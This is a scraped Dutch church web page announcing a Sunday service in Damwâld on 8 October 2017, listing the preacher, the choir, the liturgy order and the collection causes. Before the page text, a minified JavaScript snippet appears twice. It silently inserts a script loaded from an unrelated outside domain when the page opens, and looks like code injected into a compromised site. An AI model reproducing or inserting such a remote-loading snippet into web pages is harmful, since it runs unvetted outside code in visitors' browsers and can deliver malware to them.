;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 8 oktober 2017 9:30 uur - PKN Damwâld
zondag 8 oktober 2017
09:30 uur
M.m.v. mannenkoor Sjongersnocht Damwâld

Kerkdienst zondag 8 oktober 2017 9:30 uur

Informatie

Voorganger:Ds. W.L. de Jong i.v.m. ziekte ds. G. Oberink
Organist:Ivo van Hijum
Mededeling:M.m.v. mannenkoor Sjongersnocht Damwâld
Liturgie
Koor zingt vooraf: Schuil maar veilig
Koor zingt vooraf: Wijs mij de weg
Welkom en mededelingen
Intochtslied Psalm 33: 1 en 2.
Stil Gebed , Votum en groet
Gebed van toenadering
Koor zingt: Heer ik kom tot U
De Tien woorden
Loflied: gez 305: 1 en 2.
Gebed
We lezen: 1 Koningen 17: 17-24
Koor zingt Wat een dag zal dat zijn
We lezen: Lucas 18: 1-8
Verkondiging
We zingen: gezang 448: 1, 2 en 3
Koor zingt: De haven van rust
Gebeden afgesloten met Onze Vader
Collecte
Koor zingt: Elk uur, elk ogenblik
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Peru

Opvang en onderwijs probleemkinderen ( Project 10 27)
Veel kinderen in Trujillo (Noord Peru) komen uit probleemgezinnen. Daardoor zijn ze vaak lastig en presteren ze slecht op school. De Presbyteriaanse gemeente zorgt voor naschoolse opvang. Kinderen kunnen zich in een veilige omgeving ontwikkelen en worden begeleid bij hun huiswerk

Tweede collecte: Kerk
Uitganscollecte: Kerk